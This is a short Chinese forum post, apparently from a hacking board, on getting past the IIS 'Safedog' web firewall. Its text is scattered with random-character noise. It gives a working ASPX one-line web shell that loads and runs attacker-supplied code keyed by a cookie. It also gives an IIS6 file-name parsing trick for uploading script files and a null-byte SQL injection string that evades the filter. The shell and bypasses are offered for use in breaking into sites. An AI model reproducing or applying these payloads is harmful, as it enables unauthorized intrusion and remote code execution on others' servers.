1、绕过IIS安全狗的一句话。; n/ o$ {( o7 W; D- j* v
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。# c4 a0 M# q: G3 @3 n7 ?4 Q: V+ j! i
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
8 l7 E$ {4 p, ]" }1 a+ O9 R, ^3 n9 m* Y" r- r3 `0 {% L
2、IIS6.0解析漏洞遇到安全狗。( [/ ^/ e' ?% m+ C# Q3 f# D* j: N0 |
文件名为
3 i3 r+ [( V$ v9 U: z" U, q I9 x2 }http://www.xxxxx.com/sh3llc0de.asp;1.jpg
* M" Z r5 j+ G$ f8 I; N2 }- o8 j( U% ]& [, h y u6 E
这样的会被IIS安全狗果断屏蔽。) x; p4 V6 ?3 t5 D$ G/ l a! T1 }6 s
改成如下名称,IIS6一样会解析:
% {' V8 h8 A* t3 }5 v) l" O4 gwww.xxxxx.com/;1.asp;1.jpg7 P& _# s+ U }" }2 K# {+ m
# K" R, b3 L8 x: X- G. k3、安全狗的注入绕过。4 C: W3 e2 R8 g- @* r
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
( y' `* b0 i3 C但如果:8 N' ^3 G6 S+ H9 l+ }
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=16 G, k% L+ X' v4 i# _: D* m
就可以成功绕过了。
3 c# r& a r! u. a4 H5 t/ H- j9 `3 q
0 _' ~5 o6 e# j! R! D7 l3 {0 }+ S: w
|